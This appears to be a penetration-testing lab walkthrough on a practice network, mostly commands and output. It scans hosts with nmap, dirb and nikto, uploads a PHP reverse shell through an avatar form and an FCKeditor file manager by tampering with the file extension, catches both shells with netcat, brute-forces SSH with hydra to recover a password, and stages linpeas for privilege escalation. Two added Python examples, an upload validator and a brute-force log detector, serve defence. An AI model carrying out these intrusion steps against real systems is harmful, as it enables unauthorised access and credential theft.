Next challenge:
Opening move, nmap:
┌──(kali㉿kali)-[~]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.1.134
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 20:34 EDT
Nmap scan report for market.itop.com.tw (172.16.1.134)
Host is up (0.064s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 29.74 seconds
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.1.153
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 20:36 EDT
Nmap scan report for hr.itop.com.tw (172.16.1.153)
Host is up (0.054s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 30.64 seconds
┌──(root㉿kali)-[~]
└─# nmap -p80 -sC -sV -O -A 172.16.1.134 172.16.1.153
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 20:37 EDT
Nmap scan report for market.itop.com.tw (172.16.1.134)
Host is up (0.025s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Maket web Site
|_http-server-header: Apache/2.4.7 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.16 (93%), Linux 3.13 (91%), Linux 3.18 (90%), Linux 4.0 (90%), Linux 3.10 - 3.12 (89%), Linux 3.10 - 4.11 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 61.38 ms 192.168.200.1
2 11.42 ms market.itop.com.tw (172.16.1.134)
Nmap scan report for hr.itop.com.tw (172.16.1.153)
Host is up (0.051s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-title: Ice Hrm Login
|_Requested resource was http://hr.itop.com.tw/app/login.php
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.16 (92%), Linux 3.13 (90%), Linux 3.10 - 4.11 (89%), Linux 3.12 (89%), Linux 3.13 or 4.2 (89%), Linux 3.16 - 4.6 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 172.16.1.134
2 61.44 ms hr.itop.com.tw (172.16.1.153)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 12.77 seconds
Hostnames showed up in the scan, so the IP-to-hostname mapping has to be updated:
┌──(root㉿kali)-[~]
└─# vim /etc/hosts
Add the entries marked by the red line in the figure below:
Only then can the site be reached:
Log in with admin/admin:
This CMS lets you upload an avatar, so first look for a PHP reverse shell:
┌──(root㉿kali)-[~]
└─# cd /home/kali/PT_day3
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# ls -al
total 52
drwxr-xr-x 2 root root 4096 Mar 12 03:25 .
drwxr-xr-x 22 kali kali 4096 Mar 17 20:31 ..
-rw-r--r-- 1 root root 5036 Mar 11 23:59 42558-1.py
-rwxr-xr-x 1 root root 4925 Mar 11 23:54 42558.py
-rwxr-xr-x 1 root root 3680 Mar 11 23:08 44156.py
-rwxr-xr-x 1 root root 1836 Mar 12 01:37 50477.py
-rwxr-xr-x 1 root root 5495 Feb 27 06:38 bbb_reverse.php
-rwxr-xr-x 1 root root 996 Mar 11 21:03 freeswitch.py
-rwxr-xr-x 1 root root 5495 Mar 12 03:21 php-reverse-shell.jpg
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# cp /usr/share/webshells/php/php-reverse-shell.php .
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# ls -al
total 60
drwxr-xr-x 2 root root 4096 Mar 17 20:58 .
drwxr-xr-x 22 kali kali 4096 Mar 17 20:31 ..
-rw-r--r-- 1 root root 5036 Mar 11 23:59 42558-1.py
-rwxr-xr-x 1 root root 4925 Mar 11 23:54 42558.py
-rwxr-xr-x 1 root root 3680 Mar 11 23:08 44156.py
-rwxr-xr-x 1 root root 1836 Mar 12 01:37 50477.py
-rwxr-xr-x 1 root root 5495 Feb 27 06:38 bbb_reverse.php
-rwxr-xr-x 1 root root 996 Mar 11 21:03 freeswitch.py
-rwxr-xr-x 1 root root 5495 Mar 12 03:21 php-reverse-shell.jpg
-rwxr-xr-x 1 root root 5496 Mar 17 20:58 php-reverse-shell.php
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# mv php-reverse-shell.php ccc_reverse.php
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# vim ccc_reverse.php
Note what our IP is now:
Change the IP in the script accordingly:
Go to the upload page shown below:
Note: change the file extension first:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# mv ccc_reverse.php ccc_reverse.jpg
And turn on interception:
Upload:
While the upload is in flight, change the extension of the intercepted file back:
Follow the steps in the order shown in the figure below:
Then switch to the following screen; the path of the uploaded file is at the red line in the figure below:
Remember to start the listener before triggering:
┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
Type the path into the address bar and press Enter to trigger it:
Reverse shell received:
┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.200.7] from (UNKNOWN) [172.16.1.153] 44256
Linux ubuntu 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
09:29:27 up 6:33, 2 users, load average: 0.13, 0.14, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jason :0 :0 17Apr21 ?xdm? 34:31 0.11s init --user
jason pts/12 :0 17Apr21 249days 0.10s 1.38s gnome-terminal
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Stabilize the shell:
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ gcc -v
gcc -v
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
This box is no use without gcc; go try .134 instead.
Since it is a website, let's see what directories it hides:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nikto -host http://172.16.1.134
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.1.134
+ Target Hostname: 172.16.1.134
+ Target Port: 80
+ Start Time: 2023-03-17 21:44:41 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2cf6, size: 597701736c404, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7923 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2023-03-17 21:47:29 (GMT-4) (168 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# dirb http://172.16.1.134
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Mar 17 21:48:55 2023
URL_BASE: http://172.16.1.134/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.1.134/ ----
+ http://172.16.1.134/index.html (CODE:200|SIZE:11510)
+ http://172.16.1.134/server-status (CODE:403|SIZE:292)
-----------------
END_TIME: Fri Mar 17 21:49:51 2023
DOWNLOADED: 4612 - FOUND: 2
Likewise the hosts table needs updating so the site can be reached:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# vim /etc/hosts
The change is at the red circle below:
Nothing much to see after connecting:
So brute-force the directories the same way:
┌──(root㉿kali)-[~]
└─# dirb http://market.itop.com.tw
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Feb 27 00:41:28 2023
URL_BASE: http://market.itop.com.tw/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://market.itop.com.tw/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/
+ http://market.itop.com.tw/index.html (CODE:200|SIZE:141)
+ http://market.itop.com.tw/server-status (CODE:403|SIZE:298)
---- Entering directory: http://market.itop.com.tw/admin/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/
+ http://market.itop.com.tw/admin/index.html (CODE:200|SIZE:141)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/
+ http://market.itop.com.tw/admin/fckeditor/index.html (CODE:200|SIZE:141)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/_source/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/css/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/dialog/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/filemanager/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/images/
+ http://market.itop.com.tw/admin/fckeditor/editor/index.html (CODE:200|SIZE:141)
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/js/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/lang/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/plugins/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/skins/
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/_source/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/dialog/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/filemanager/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/skins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Feb 27 00:48:38 2023
DOWNLOADED: 18448 - FOUND: 5
Found an upload page; follow the numbered steps in the figure below:
Open Burp Suite to intercept:
First rename the jpg used earlier back to php:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# mv ccc_reverse.jpg ccc_reverse.php
Upload:
This time nothing special needs changing; just upload it as is:
Of course, start the listener before triggering:
┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
Trigger it:
Reverse shell received:
┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.200.7] from (UNKNOWN) [172.16.1.134] 59482
Linux ubuntu 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
10:13:15 up 1 day, 2:10, 2 users, load average: 0.12, 0.09, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jason :0 :0 16Apr21 ?xdm? 1:03m 0.10s init --user
jason pts/0 :0 15Dec21 457days 0.04s 0.04s bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
But again, no gcc:
$ gcc
/bin/sh: 1: gcc: not found
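Both uploads above went through because the server trusted whatever filename and bytes the client sent: on hr.itop.com.tw the extension was swapped back to .php in the proxy, and on market.itop.com.tw the FCKeditor file manager took the .php file unchanged. As an added example that is not code from the notes or from either application, here is the server-side check that stops both cases: the stored extension comes from an allowlist, the bytes must carry the magic number of the claimed image type, and the client's Content-Type is never consulted. The function names and the sample byte strings are constructed assumptions.

```python
import os
import re

# Extensions the avatar/file upload may be stored under, with the magic
# bytes each format must start with. Anything else is rejected outright.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Byte sequences that have no business inside an image; a PHP file whose
# extension was edited in the proxy still starts with one of these.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")
SAFE_STEM = re.compile(r"^[a-z0-9_-]{1,64}$")


class UploadRejected(ValueError):
    pass


def validate_upload(filename: str, content: bytes, max_bytes: int = 2_000_000) -> str:
    """Return the name the file may be stored under, or raise UploadRejected.

    The client-supplied Content-Type header is deliberately not a parameter:
    it is attacker-controlled and says nothing the bytes themselves do not.
    """
    if len(content) > max_bytes:
        raise UploadRejected("file too large")
    # Keep only the last path component, so '../../x.jpg' cannot escape the
    # upload directory; then split off exactly one extension.
    base = os.path.basename(filename.replace("\\", "/")).lower()
    stem, dot, ext = base.rpartition(".")
    if not dot or ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not SAFE_STEM.match(stem):
        # Also rejects double extensions such as shell.php.jpg (stem has a dot).
        raise UploadRejected("unsafe filename")
    # The bytes must actually be the format the extension claims to be.
    if not content.startswith(ALLOWED[ext]):
        raise UploadRejected("content is not a valid " + ext + " image")
    # A valid image header followed by PHP is still rejected (polyglot case).
    if any(marker in content.lower() for marker in SCRIPT_MARKERS):
        raise UploadRejected("script markers inside image data")
    return f"{stem}.{ext}"


def is_accepted(filename: str, content: bytes) -> bool:
    """Convenience wrapper: True if validate_upload would store the file."""
    try:
        validate_upload(filename, content)
        return True
    except UploadRejected:
        return False


# Constructed samples, not files from the notes: a minimal JPEG header padded
# with zeros, and a harmless PHP snippet standing in for the reverse shell.
GOOD_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
PHP_FILE = b"<?php echo 'hello'; ?>\n"

if __name__ == "__main__":
    cases = [
        ("avatar.jpg", GOOD_JPEG),              # legitimate upload
        ("ccc_reverse.php", PHP_FILE),          # second target: PHP uploaded as-is
        ("ccc_reverse.jpg", PHP_FILE),          # first target: extension swapped to .jpg
        ("ccc_reverse.php.jpg", GOOD_JPEG),     # double extension
        ("avatar.jpg", GOOD_JPEG + PHP_FILE),   # image/PHP polyglot
    ]
    for name, data in cases:
        print(f"{name:22} -> {'accepted' if is_accepted(name, data) else 'rejected'}")
```

Serving the upload directory with script execution disabled (or from a host that never runs PHP) is the second half of the fix; the validator only keeps the file from ever being stored under an executable name.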
So this time start a large-scale scan:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nmap -F 172.16.1-20.*
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 22:20 EDT
Nmap scan report for 172.16.1.51
Host is up (0.026s latency).
Not shown: 89 filtered tcp ports (no-response), 8 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
Nmap scan report for 172.16.1.67
Host is up (0.037s latency).
All 100 scanned ports on 172.16.1.67 are in ignored states.
Not shown: 100 closed tcp ports (reset)
Nmap scan report for 172.16.1.87
Host is up (0.042s latency).
Not shown: 90 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Nmap scan report for 172.16.1.105
Host is up (0.037s latency).
Not shown: 88 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
5060/tcp open sip
8081/tcp open blackice-icecap
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Nmap scan report for 172.16.1.112
Host is up (0.036s latency).
Not shown: 96 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Nmap scan report for 172.16.1.120
Host is up (0.035s latency).
Not shown: 92 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
8081/tcp open blackice-icecap
Nmap scan report for market.itop.com.tw (172.16.1.134)
Host is up (0.035s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for hr.itop.com.tw (172.16.1.153)
Host is up (0.035s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.16.1.157
Host is up (0.025s latency).
Not shown: 97 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp closed https
Nmap scan report for 172.16.1.191
Host is up (0.037s latency).
Not shown: 95 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8888/tcp open sun-answerbook
Nmap scan report for wpress.itop.com.tw (172.16.1.222)
Host is up (0.038s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.16.3.124
Host is up (0.034s latency).
Not shown: 95 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap scan report for 172.16.3.125
Host is up (0.037s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap scan report for 172.16.3.126
Host is up (0.035s latency).
Not shown: 98 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap scan report for 172.16.3.128
Host is up (0.033s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap scan report for 172.16.5.1
Host is up (0.033s latency).
Not shown: 94 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Nmap scan report for 172.16.19.2
Host is up (0.034s latency).
Not shown: 91 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
Nmap scan report for 172.16.19.9
Host is up (0.035s latency).
Not shown: 90 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Nmap scan report for 172.16.20.3
Host is up (0.034s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.16.20.6
Host is up (0.035s latency).
Not shown: 98 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap scan report for 172.16.20.7
Host is up (0.036s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 5120 IP addresses (21 hosts up) scanned in 51.91 seconds
Try one of them:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nmap -p- 172.16.3.128
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 22:22 EDT
Nmap scan report for 172.16.3.128
Host is up (0.059s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 30.61 seconds
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nmap -p22 172.16.3.128 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 22:29 EDT
Nmap scan report for 172.16.3.128
Host is up (0.020s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 ce8eb17409f0e9ac520810f2d82eb6e0 (DSA)
| 2048 a2c1d9a1e1f7302eae85cb050c3559ed (RSA)
| 256 0d8658bbfb1c322e0d70f95cf1e13eca (ECDSA)
|_ 256 b6e04ffd17be8f891da29a0cfe45a3ef (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.16 (93%), Linux 3.13 (91%), Linux 3.18 (90%), Linux 3.10 - 3.12 (89%), Linux 3.10 - 4.11 (89%), Linux 3.12 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 62.84 ms 192.168.200.1
2 11.76 ms 172.16.3.128
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.95 seconds
Only SSH is open, so blast it with hydra until the credentials give:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# hydra -l jason -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt ssh://172.16.3.128
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-17 22:31:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000000 login tries (l:1/p:1000000), ~62500 tries per task
[DATA] attacking ssh://172.16.3.128:22/
[STATUS] 82.00 tries/min, 82 tries in 00:01h, 999921 to do in 203:15h, 13 active
[STATUS] 92.00 tries/min, 276 tries in 00:03h, 999727 to do in 181:07h, 13 active
[22][ssh] host: 172.16.3.128 login: jason password: apollo
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 9 final worker threads did not complete until end.
[ERROR] 9 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-17 22:37:17
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# ssh jason@172.16.3.128
jason@172.16.3.128's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com/
775 packages can be updated.
483 updates are security updates.
Last login: Sat Oct 29 16:20:08 2022 from 192.168.200.15
jason@Ubuntu14:~$
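The hydra run above (roughly 90 tries per minute from one source, ending in a single accepted login) is exactly the pattern sshd writes to /var/log/auth.log on the target. As an added example that is not part of the original notes, here is a small Python detector run over constructed auth.log lines: it flags a source that crosses a failure threshold inside a time window and, more importantly, an accepted login from a source that is still bursting, which is the guess that worked. The log lines, hostname, PIDs and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches Ubuntu 14.04-style sshd lines; syslog timestamps carry no year.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2"
)


def parse_line(line: str, year: int = 2023):
    """Return (timestamp, result, user, ip) or None for lines we don't care about."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold: int = 10, window_s: int = 60):
    """Scan sshd log lines in order and return a list of alerts.

    ('burst', ip, n)                   n failures from ip inside window_s seconds
    ('success_after_burst', ip, user)  a login accepted while ip is still bursting
    """
    alerts = []
    failures = defaultdict(deque)  # ip -> timestamps of failures in the window
    bursting = set()
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        q = failures[ip]
        # Slide the window: forget failures older than window_s.
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if not q:
            bursting.discard(ip)
        if result == "Failed":
            q.append(ts)
            if len(q) >= threshold and ip not in bursting:
                bursting.add(ip)
                alerts.append(("burst", ip, len(q)))
        elif ip in bursting:
            alerts.append(("success_after_burst", ip, user))
    return alerts


# Constructed log, not from the notes: one ordinary typo-then-login from an
# admin workstation, then a hydra-style run from one source ending in success.
SAMPLE_LOG = [
    "Mar 17 22:30:02 Ubuntu14 sshd[2001]: Failed password for jason from 192.168.200.15 port 50122 ssh2",
    "Mar 17 22:30:09 Ubuntu14 sshd[2001]: Accepted password for jason from 192.168.200.15 port 50122 ssh2",
] + [
    f"Mar 17 22:36:{s:02d} Ubuntu14 sshd[{2100 + s}]: Failed password for jason "
    f"from 192.168.200.7 port {51000 + s} ssh2"
    for s in range(0, 60, 5)
] + [
    "Mar 17 22:37:17 Ubuntu14 sshd[2199]: Accepted password for jason from 192.168.200.7 port 51999 ssh2",
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The hydra warning about reducing parallel tasks shows why this also works as a preventive control: sshd's connection limits and a failure-rate lockout such as fail2ban turn 200 hours of guessing into something that is noticed on the first minute.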
With a shell in hand, naturally check whether privilege escalation is possible, so send in the enumeration tools:
┌──(root㉿kali)-[~]
└─# cd /home/kali
┌──(root㉿kali)-[/home/kali]
└─# ls -al
total 1040
drwxr-xr-x 22 kali kali 4096 Mar 17 21:29 .
drwxr-xr-x 4 root root 4096 Jan 15 00:59 ..
-rw-r--r-- 1 kali kali 220 Aug 8 2022 .bash_logout
-rw-r--r-- 1 kali kali 5551 Aug 8 2022 .bashrc
-rw-r--r-- 1 kali kali 3526 Aug 8 2022 .bashrc.original
drwx------ 6 kali kali 4096 Feb 19 07:36 .BurpSuite
drwxr-xr-x 10 kali kali 4096 Feb 19 04:23 .cache
drwxr-xr-x 15 kali kali 4096 Feb 27 06:51 .config
-rw-r--r-- 1 kali kali 13176 Mar 12 04:32 cve-2017-16995.c
-rw-r--r-- 1 kali kali 4715 Mar 11 03:16 cyberlab.ovpn
drwxr-xr-x 2 kali kali 4096 Dec 10 01:17 Desktop
-rw-r--r-- 1 kali kali 35 Nov 7 06:23 .dmrc
drwxr-xr-x 2 kali kali 4096 Nov 7 06:23 Documents
drwxr-xr-x 2 kali kali 4096 Mar 11 03:17 Downloads
-rw-r--r-- 1 kali kali 11759 Aug 8 2022 .face
lrwxrwxrwx 1 kali kali 5 Aug 8 2022 .face.icon -> .face
drwx------ 3 kali kali 4096 Nov 7 06:23 .gnupg
-rw------- 1 kali kali 0 Nov 7 06:23 .ICEauthority
drwxr-xr-x 4 kali kali 4096 Feb 19 05:32 .java
-rw-r--r-- 1 kali kali 46631 Mar 12 04:03 LinEnum.sh
-rw-r--r-- 1 root root 776167 Apr 17 2022 linpeas.sh
drwx------ 3 kali kali 4096 Nov 7 06:23 .local
drwx------ 5 kali kali 4096 Nov 13 02:21 .mozilla
drwxr-xr-x 10 kali kali 4096 Feb 26 07:08 .msf4
drwxr-xr-x 2 kali kali 4096 Nov 7 06:23 Music
-rw------- 1 kali kali 103 Dec 10 22:12 .mysql_history
drwxr-xr-x 2 kali kali 4096 Feb 26 06:43 Pictures
-rw-r--r-- 1 kali kali 807 Aug 8 2022 .profile
drwxr-xr-x 2 root root 4096 Mar 17 22:36 PT_day3
drwxr-xr-x 2 kali kali 4096 Nov 7 06:23 Public
drwx------ 2 kali kali 4096 Jan 15 01:42 .ssh
-rw-r--r-- 1 kali kali 0 Nov 13 05:38 .sudo_as_admin_successful
